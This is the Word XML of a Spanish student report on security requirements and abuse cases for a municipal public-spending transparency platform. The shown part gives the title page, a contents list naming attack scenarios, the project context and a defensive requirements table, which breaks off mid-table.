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F4A3A" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B2">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7731F937" wp14:editId="5332A7CB">
            <wp:extent cx="2333625" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="17" name="Imagen 17" descr="Interfaz de usuario gráfica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Interfaz de usuario gráfica  Descripción generada automáticamente con confianza media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584E" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="000F5FF0">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490B7BE1" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="000F5FF0">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589C54E2" w14:textId="4F3D8902" w:rsidR="000F5FF0" w:rsidRDefault="007011B2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Casos de Abuso y Gestión de Riesgos en Gasto Transparente Municipal: Plataforma de Transparencia y Seguimiento del Gasto Público Alineada con el ODS 16</w:t>
      </w:r>
      <w:r w:rsidR="00B03C14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-C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s-CO"/>
        </w:rPr>
        <w:t>Paz, Justicia e Instituciones Sólidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00713C65" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="000F5FF0">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5C0757" w14:textId="51E7166C" w:rsidR="00B03C14" w:rsidRDefault="007011B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Dylan Steven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Jimenez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Cobos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACD3B8" w14:textId="799D1E31" w:rsidR="00B03C14" w:rsidRDefault="007011B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Santiago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Angel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Rodriguez</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13269D73" w14:textId="29541516" w:rsidR="000F5FF0" w:rsidRDefault="007011B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Víctor A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>lfonso Alarcón Ospina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9BD65" w14:textId="05A37B5A" w:rsidR="00B03C14" w:rsidRDefault="00B03C1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BBFCCE3" w14:textId="38240C36" w:rsidR="00B03C14" w:rsidRDefault="00B03C1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9F5553F" w14:textId="77777777" w:rsidR="00B03C14" w:rsidRDefault="00B03C1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730571" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B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Facultad de Ingeniería, Universidad Manuela Beltrán</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A49C07" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B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Desarrollo de Software Seguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA00ED7" w14:textId="2879FF17" w:rsidR="000F5FF0" w:rsidRDefault="00B03C1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Septiembre 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6615E3" w14:textId="77777777" w:rsidR="000F5FF0" w:rsidRDefault="007011B2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:id w:val="-182203284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p w14:paraId="50C0058D" w14:textId="0D08A855" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:rStyle w:val="Ttulo1Car"/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proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00B03C14">
            <w:rPr>
              <w:rStyle w:val="Ttulo1Car"/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Contenido</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
        </w:p>
        <w:p w14:paraId="229C9E89" w14:textId="37B12CC7" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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B03C14">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00B03C14">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B03C14">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc240017706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1. Contexto del Proyecto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_Toc240017706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7AB313" w14:textId="3B9BF26C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07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Atributos de Seguridad Clave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_Toc240017707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34E0C8" w14:textId="3E834ECD" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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08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2. Requisitos de Seguridad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_Toc240017708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A01C51" w14:textId="2ACE0526" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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09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3. Casos de Abuso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_Toc240017709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6B2A17" w14:textId="1E64E0BE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0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CA-01 Manipulación de Registros Presupuestales por Funcionario Interno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_Toc240017710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3A85F4" w14:textId="0D0B5259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1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CA-02 Ataque DDoS durante Rendición de Cuentas Electoral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_Toc240017711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31B410" w14:textId="1761C983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2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CA-03 Inyección SQL en Buscador de Contratos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_Toc240017712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D59C28" w14:textId="4A5DE465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3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CA-04 XSS Persistente en Panel de Comentarios Ciudadanos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_Toc240017713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D49C46" w14:textId="6C248A0F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4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CA-05 Suplantación de Identidad de Funcionario (Phishing)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_Toc240017714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BF8EE" w14:textId="0A65A363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5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CA-06 Acceso No Autorizado a Reportes Confidenciales (IDOR)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_Toc240017715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099196" w14:textId="59482FDA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6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CA-07 Fuerza Bruta sobre Cuentas de Auditores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_Toc240017716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22FA23" w14:textId="34EB7DF5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7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CA-08 Defacement del Portal Público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_Toc240017717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E2F7F7" w14:textId="7E83D5C3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8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CA-09 Exfiltración Masiva de Datos vía API sin Restricción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_Toc240017718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4FA41C" w14:textId="54CC10A7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19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CA-10 Carga de Documentos Maliciosos (Malware Upload)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_Toc240017719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5796CB" w14:textId="4511070B" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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0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4. Plan de Pruebas de Seguridad Basadas en Riesgo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_Toc240017720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40D4AA" w14:textId="1AE03069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1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CA-01 Manipulación de Registros Presupuestales por Funcionario Interno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_Toc240017721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2B85C1" w14:textId="1B18008C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2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CA-02 Ataque DDoS durante Rendición de Cuentas Electoral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_Toc240017722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B70AAB" w14:textId="7682EE12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3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CA-03 Inyección SQL en Buscador de Contratos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_Toc240017723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20F585" w14:textId="0CFCC794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4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CA-04 XSS Persistente en Panel de Comentarios Ciudadanos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_Toc240017724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77E062" w14:textId="6F293114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5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CA-05 Suplantación de Identidad de Funcionario (Phishing)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_Toc240017725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7ED1C" w14:textId="0FC2C3F7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6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CA-06 Acceso No Autorizado a Reportes Confidenciales (IDOR)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_Toc240017726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803F62" w14:textId="078BD243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7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CA-07 Fuerza Bruta sobre Cuentas de Auditores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_Toc240017727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0C8850" w14:textId="268E1744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8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CA-08 Defacement del Portal Público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_Toc240017728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D64C9E" w14:textId="2ED8AD19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29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CA-09 Exfiltración Masiva de Datos vía API sin Restricción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_Toc240017729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45FE13" w14:textId="38612AC3" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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30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Prueba CA-10 Carga de Documentos Maliciosos (Malware Upload)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_Toc240017730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30ECFA" w14:textId="0DE60EB5" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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31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5. Conclusiones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_Toc240017731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0016FF" w14:textId="14D0D0E1" w:rsidR="00B03C14" w:rsidRPr="00B03C14" w:rsidRDefault="00B03C14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0017732" w:history="1">
            <w:r w:rsidRPr="00B03C14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Referencias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instrText xml:space="preserve"> PAGEREF _Toc240017732 \h </w:instrTex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F6E77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B03C1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A1DABF" w14:textId="7FB63B2A" w:rsidR="00B03C14" w:rsidRDefault="00B03C14">
          <w:r w:rsidRPr="00B03C14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60627FC0" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc240017706"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Contexto del Proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3DCBE43B" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="005765CC" w:rsidP="00B03C1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Gasto Transparente Municipal es una plataforma web pública que permite a ciudadanos, periodistas y organizaciones civiles fiscalizar el uso de fondos públicos municipales en tiempo real. Los datos son de carácter público, pero presentan un alto riesgo de manipulación por actores políticos o económicos, lo que convierte la seguridad en un requisito crítico y no opcional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF9276" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1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" w:name="_Toc240017707"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Atributos de Seguridad Clave</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="54A28957" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Integridad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Control de versiones auditable de cada registro presupuestal publicado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BAB97" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Disponibilidad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Alta disponibilidad ante ataques DDoS, especialmente en períodos electorales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572A9A7" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Confidencialidad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Protección de documentos internos antes de su publicación oficial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE357CA" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Trazabilidad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Log inmutable de todas las modificaciones con firma digital del funcionario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABBE6C" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Autenticidad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Firma digital verificable por cualquier ciudadano en datos publicados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB4E722" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00B03C14" w:rsidRDefault="004C1787" w:rsidP="00B03C14">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03C14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Nota de sensibilidad: La plataforma opera en un contexto de alto escrutinio político. Un incidente de seguridad no es solo un problema técnico, es una crisis institucional con impacto directo en la democracia municipal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50140281" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc240017708"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>2. Requisitos de Seguridad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2AB0F225" w14:textId="5797FD39" w:rsidR="00677A69" w:rsidRDefault="004C1787" w:rsidP="00B03C1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Se definen 10 requisitos de seguridad (funcionales y no funcionales) que debe cumplir Gasto Transparente Municipal, alineados con los principios de la tríada CIA y las recomendaciones de OWASP (OWASP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Foundation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>, s.f.-a).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA6273" w14:textId="60FFC173" w:rsidR="00B03C14" w:rsidRDefault="00B03C14" w:rsidP="00B03C1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</w:p>
    <w:p w14:paraId="4EAD335D" w14:textId="77777777" w:rsidR="00B03C14" w:rsidRPr="00307BF1" w:rsidRDefault="00B03C14" w:rsidP="00B03C1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</w:p>
    <w:p w14:paraId="614642C4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Tabla 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C446D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Requisitos de Seguridad (RS-01 a RS-10)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1"/>
        <w:gridCol w:w="1319"/>
        <w:gridCol w:w="1823"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2730"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3BF2184E" w14:textId="77777777" w:rsidTr="005765CC">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="3D59E0AA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ID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3C0CB625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Tipo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EB481DB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Requisito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7DE69548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Descripción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11F9EC7C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Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="392961FB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519B383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RS-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC83B3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Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E94B7B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Autenticación Multifactor (MFA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5A038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El sistema debe requerir MFA (TOTP/FIDO2) para todos los usuarios con roles de editor, auditor y administrador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A458C6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Previene accesos no autorizados incluso si las credenciales son comprometidas por phishing o fuerza bruta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="19EF1895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03A0A3F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RS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44BFF78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No Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1387CEF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Cifrado de Datos en Reposo y Tránsito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1C645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Todos los datos sensibles se cifran con AES-256 en reposo y TLS 1.3 en tránsito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4841A8A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Garantiza confidencialidad e integridad ante accesos no autorizados a la infraestructura.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="450BDA37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048EDBC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RS-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77923E5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Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="406EF37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Registro de Auditoría Inmutable (Append-Only Log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7EDDF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Cada inserción, modificación o eliminación de registros presupuestales genera una entrada en un log append-only firmado digitalmente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D154BD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Permite trazabilidad completa de cambios y detecta manipulaciones de datos públicos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5137FB0C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72BF38A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RS-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CED8C9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No Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3036D3D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Protección Anti-DDoS y Rate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426ADE2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La plataforma debe soportar picos de 50 000 req/min con rate limiting por IP/token y CDN con scrubbing DDoS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18D8D38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El proyecto es políticamente sensible; un DDoS en período electoral puede silenciar la rendición de cuentas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="52F12D6A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6BA6D1C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RS-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79C99D2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Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469E91F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Control de Acceso Basado en Roles (RBAC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C51D45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Roles definidos: Ciudadano (solo lectura), Editor (escritura limitada), Auditor (revisión), Administrador (gestión total).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4C0F3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Limita el radio de acción de credenciales comprometidas y reduce el riesgo de modificaciones no autorizadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="31C6B2B9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0968136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RS-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BD0C5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Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0790439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Firma Digital de Registros Presupuestales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447E092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Cada registro público publicado debe incluir firma digital del funcionario responsable, verificable por cualquier ciudadano.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32318BA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Garantiza autenticidad e impide la repudiación; cualquier alteración invalida la firma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="0B8417C4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2EC33A2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RS-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1299AC1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No Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6B359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Expiración de Sesión por Inactividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F294E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Sesiones de usuarios privilegiados expiran tras 10 min de inactividad; ciudadanos a los 30 min.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20482A1B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Reduce la ventana de explotación de sesiones abiertas en equipos compartidos o robados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2000A6B7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6590786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RS-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72678B6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Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="095B46D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Validación y Sanitización de Entradas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DBA1CF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Todos los campos de formulario y parámetros de API deben validarse con whitelist y sanitizarse contra SQLi, XSS y Path Traversal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F7298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Bloquea las técnicas de inyección más comunes definidas en OWASP Top 10.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5566C3BD" w14:textId="77777777" w:rsidTr="005765CC">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5408745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RS-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
